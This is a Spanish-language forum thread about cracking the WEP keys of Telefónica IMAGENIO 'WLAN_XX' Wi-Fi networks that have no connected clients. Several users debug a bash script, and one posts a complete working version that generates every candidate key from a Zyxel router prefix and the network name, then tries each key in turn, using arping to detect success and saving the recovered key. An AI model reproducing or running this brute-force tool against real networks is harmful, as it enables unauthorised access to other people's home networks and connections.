 Autor
|
Tema: descifrar redes IMAGENIO sin clientes y sin paquetes ;) (Leído 46,726 veces)
|
pakoto
 Desconectado
Mensajes: 8
|
Utilizo ubuntu y el script me da un error arith count+1. Parece que no reconoce la suma o algo asi.
EDITO: En ubuntu arranca cambiando sh por bash en la primera linea. A ver si consigo algo.
|
|
|
|
« Última modificación: 3 Noviembre 2006, 17:57 por pakoto »
|
En línea
|
|
|
|
epidemya
Desconectado
Mensajes: 14
|
Cohone como pongo los archivos en el PATH Estos dos últimos ficheros deben estar en el PATH (se deben poder ejecutar desde cualquier directorio) gracias
|
|
|
|
|
En línea
|
|
|
|
cohone
Desconectado
Mensajes: 194
|
Por ejemplo, copialos al directorio /usr/local/sbin que siempre suele estar en el path, como usuario root, claro. con el comando: echo $PATH te mostrará todos los directorios, separados por dos puntos donde busca para ejecutar los comandos. Por ejemplo, cuando instalas el airodump, los ejecutables te los copia a /usr/local/sbin/ y por eso lo puedes ejecutar desde cualquier directorio. |
|
|
|
|
En línea
|
|
|
|
epidemya
Desconectado
Mensajes: 14
|
Cohone como pongo los archivos en el PATH Estos dos últimos ficheros deben estar en el PATH (se deben poder ejecutar desde cualquier directorio) gracias Me respondo yo solito, ejecutando echo $PATH ves las rutas, que estan definidas, en todas ellas buscara por defecto las aplicaciones, en Hax-puppy poniendo los nuevos progrmas en my-aplications/bin los encuentra sin ningun problema
|
|
|
|
|
En línea
|
|
|
|
mercucio
Desconectado
Mensajes: 28
|
Hola, El airodump me detecta una red WLAN_XX sin clientes. Deduzco que es una imagenio. El problema es que no tiene nunca clientes conectados, y cuando vi este post me pareció encontrar la solución. El problema es que se ve que soy aún demasiado novato como para seguirlo todo al pie de la letra. Por ejemplo, ¿donde tengo que transcribir el script? Lo hice en el editor de Troppix y de Hax-Puppy, pero por lo visto, o no es ahí donde debo hacerlo o no lo hice bien. ¿Con qué programa debo hacerlo? ¿Dónde lo escribo? Otro problema que se me planteó es el de los "espacios". Es decir, no veo muy claro dónde tienen que ir espacios y dónde no. Por ejemplo: # ENTRADAS:
#
# $1 : Interfaz
# $2 : Essid
# $3 : AP ¿Ahí, después del # y del 1, 2 y 3 deben ir espacios, verdad? arping2 -i$1 -c1 -w0 192.168.1.1 > /dev/null 2>&1
count=$((count+1)) En la segunda línea, ¿debe ir un tabulador, no? Y una última duda: los programas necesarios (wlandecrypter, arping2 , aireplay, wepattack) ¿están incluídos en Troppix o en Hax-Puppy? P.D. Si existe otro método más sencillo (o mejor, dicho, para novatos) para descifrar este tipo de redes cuando no hay clientes conectados, me podríais indicar cuál es? Gracias y saludos! |
|
|
|
|
En línea
|
|
|
|
Benit0
Desconectado
Mensajes: 2
|
Hola, Leyendo por el hilo, se comenta...
Tienes una atheros?? Si no es asi el wdg puede no funcionar correctamente en el modo de "descifrar sin paquetes".
No sé si alguno le ha pasado, pero redirigiendo arping a un fichero de log, he obtenido lo siguiente, arping: libnet_init(): unknown physical layer type 0x321 arping: libnet_init(): unknown physical layer type 0x321 arping: libnet_init(): unknown physical layer type 0x321 arping: libnet_init(): unknown physical layer type 0x321 arping: libnet_init(): unknown physical layer type 0x321 Antes de ejecutar el script, he probado arping y funcionaba correctamente, también he descargado las fuentes y las he compilado, ya que uso el arping que viene en Debian (version 2.05). Llevo el chipset RT2500. El metodo propuesto no me ha funcionado.  El modo con paquetes, ha funcionado correctamente. :-) Saludos, Benit0 |
|
|
|
« Última modificación: 7 Noviembre 2006, 05:43 por Benit0 »
|
En línea
|
|
|
|
alexitos
Desconectado
Mensajes: 11
|
Buenas, a mi también me daba el error de (count+1),
esto se soluciona cambiando la primera linea del script por #!/bin/bash
Os hago una pregunta, hay que estar en modo monitor o managed?
Porque para que el aireplay-ng -4 .... funcione tengo que estar en monitor.
Pero nada más iniciar el scrip me pasa a managed...
Alguna idea?
Muchas gracias
|
|
|
|
|
En línea
|
|
|
|
*dudux
Ex-Staff
Desconectado
Mensajes: 2.383
.....traficando con sueños.....
|
Moderadores!!!
este post estaria bien que fuera chincheta.....
solo decir eso...
|
|
|
|
|
En línea
|
|
|
|
Alkimi
Desconectado
Mensajes: 11
|
Hola a todos, despues de leer el hilo que me parecio interesante me dedique a modificar un poco el script para no tener que utilizar el wlandecrypter ya que parece que la gente se hace un lio y lo he incluido en el script. Ademas de unos cambios esteticos en el codigo y que la salida salga por fichero con el formato AP ESSID Key. Por lo que ya no hay que pasarle el fichero de claves al script solo el "AP" "letras del ESSID" "interface" y "canal" espero que os guste.
#!/bin/sh
#
# ENTRADAS:
#
# $1 : Interfaz
# $2 : Letras_Essid
# $3 : AP
# $4 : Channel
#
# basado en el original de nilpOinter, mejorado por cohone
# By Alkimi
# se ha includido el generador de claves para no tener que crear el diccionario
# se genera un fichero de salida con la clabe correcta llamado salida_claves.txt con el formato
# AP ESSID KEY
#generador manual de claves para los Zyxtel Z001349
#habria que mejorarlo para detectar todos los modelos de telefonica
wlandecrypter()
{
$cadena
$ESSID
$salida
cadena='Z001349'
ESSID=$2
if [ ! -s $3 ]; then
# creacion del archivo de claves a partir del ESSID y de la
# cadena de los Zyxtel si existe el archivo continua con la ejecucion
# sino lo crea y seria valido para todas las WLAN_XX con XX igual
for i in $(seq 0 65535); do
j=$(printf %04X $i);
salida=$cadena$j$ESSID;
echo $salida >> $3
done
fi
}
#funcion principal
principal()
{
#control de parametros
if [ $# -lt 4 ]; then
echo "$0 '[Interfaz] [letras_Essid] [AP] [Chan] '"
exit 1
fi
$WLAN
$AP
$Interfaz
$Chan
Interfaz=$1
WLAN=WLAN_$2
AP=$3
Chan=$4
#llamada a la funcion para generar claves
wlandecrypter $AP $2 $WLAN
iwconfig $Interfaz mode managed
iwconfig $Interfaz essid $WLAN
iwconfig $Interfaz ap $AP
iwconfig $Interfaz channel $Chan
iwconfig $Interfaz key s:AAAAAAAAAAAAA
echo -n " * Esperando conexion: "
while [ "$(iwconfig $Interfaz 2> /dev/null | grep Link | cut -d\= -f2 | cut -d \/ -f1)" = "0" ]; do
echo -n "."
sleep 1;
done
echo " OK"
ifconfig $Interfaz 192.168.1.254
count=0
count_echo=0
for key in `cat $WLAN`; do
iwconfig $Interfaz key s:$key
while [ "$(iwconfig $Interfaz 2> /dev/null | grep Link | cut -d\= -f2 | cut -d \/ -f1)" = "0" ]; do
echo -en "\r * Conexion perdida, esperando..."
sleep 1;
done
arping -I$Interfaz -c1 192.168.1.1 -w0 > /dev/null 2>&1
if [ $? -eq 0 ]; then
echo -en "\nKey:"
echo $key
echo "$AP\t$WLAN\t$key" >> salida_claves.txt
exit 0
fi
count=$((count+1))
count_echo=$((count_echo+1))
if [ $count_echo -ge 50 ]; then
echo -en "\r * Claves probadas: $count"
count_echo=0
fi
done
}
#inicio del script
principal $*
#fin del stript
|
|
|
|
« Última modificación: 9 Noviembre 2006, 12:25 por Alkimi »
|
En línea
|
|
|
|
alexitos
Desconectado
Mensajes: 11
|
Hola a todos.
Si lo he entendido bien lo que hace el scrip es conectarse a la red WLAN_XX con cada contraseña y mandar una especie de ping. Asi se repite para cada clave del fichero de claves.
Supongo que estas lineas quieren decir que si no se está asociado a la red se espere un poco mas, no?
while [ "$(iwconfig $1 2> /dev/null | grep Link | cut -d\= -f2 | cut -d \/ -f1)" = "0" ]; do
echo -n "."
sleep 1;
done
Alguien puede explicarme esto, porque a mi SI NO ESTOY ASOCIADO la siguiente sentencia:
echo $(iwconfig eth1 2> /dev/null | grep Link | cut -d\= -f2 | cut -d \/ -f1)
me da como respuesta toda esta linea:
Link Quality:0 Signal level:0 Noise level:0
Con lo que si se hace la comparación =0 dará que es falsa y por lo tanto el scrip piensa que estoy asociado.
Por eso creo que es un posible BUG del wlandestroy, yo no tengo ni idea de bash, si alguien sabe un poco seguro que lo apaña en dos minutos. De momento estoy intentando con "cut" y compañia, pero no consigo hacer lo que quiero (Aislar el parametro de Link quality)
Un saludo.
|
|
|
|
|
En línea
|
|
|
|
ZariK
Desconectado
Mensajes: 83
|
Wenass!!!
Sabeis cm modificar el wlandestroy de manera q funcione cn redes q tenga de essid distinta a wlan_xx??? xo q se sepa con certeza q es de telefonica (router zyxel x ejemplo y demas pistas...)
He intentado hacerlo cn mi linea q es de telefonica y tngo un router zyxel.. me he inventado el essid ya q tengo puesto otro distinto a wlanxx y he tenido q poner "inventado" para q funcione el wlandestroy wlan_31 xo claro la clave q me saka tiene los dos ultimos digitos mal cm es normal xD.
Pos eso, haber si sabeis hacer funcionar el wlandestroy cn redes q tengan el essid distinto a wlan_xx.
Gracias x vuestro esfuerzo. Saludos
|
|
|
|
|
En línea
|
|
|
|
alexitos
Desconectado
Mensajes: 11
|
Buenas otra vez. Ya he solucionado lo del wlandestroy A mi me funciona cambiando la sentencia: while [ "$(iwconfig $Interfaz 2> /dev/null | grep Link | cut -d\= -f2 | cut -d \/ -f1)" = "0" ]; do por esta otra: while [ "$(iwconfig $1 2> /dev/null | grep Link | gawk -F" " '{print $2}' | gawk -F: '{print $2}' )" = "0" ]; do Lo mismo a alguien le es util. Un saludo y hasta otra
|
|
|
|
|
En línea
|
|
|
|
jubuntu
Desconectado
Mensajes: 1
|
Hola,
Voy a explicar mi experiencia con wlandecripter. He utilizado ubuntu para ello.
Una vez he conseguido instalarme wlandecrypter, wepattack , arping (NOTA:en ubuntu tengo arping y no arping2) he seguido la explicación que se hizo en el primer mensaje de este thread.
El principal problema que tenía era que si ejecutaba aireplay -4 -b {BSSID} -f1 ath0 en una shell y a continuación en otra shell ejecutaba wlandestroy.sh, dentro del script wlandestroy.sh configuraba la tarjeta wireless en modo managed y por lo tanto aireplay no podía capturar ningún paquete AP.
Después de estudiar wlandestroy.sh me di cuenta que no era necesario aireplay, sino que en el momento que se realizaba arping con la password correcta el router respondía. Y por lo tanto ya sabía la clave.
Así que modifiqué el script para que cuando el arping devolviera "Recived x" donde x era mayor que 0 signifaba, respondia que ya teniamos la clave wep.
En principio, la ip del router es la 192.168.1.1 y no creo que los router de imagenio tengan otras.
Un saludo a todos
|
|
|
|
|
En línea
|
|
|
|
Alkimi
Desconectado
Mensajes: 11
|
Estoy trabajando en una nueva version de script para que sirba para todas las redes imagenio, espero tenerlo en breve.
|
|
|
|
|
En línea
|
|
|
|
ZariK
Desconectado
Mensajes: 83
|
Ánimo!!! No dudes en postear tus resultadoss!!
Saludoss!!!
|
|
|
|
|
En línea
|
|
|
|
|
 |
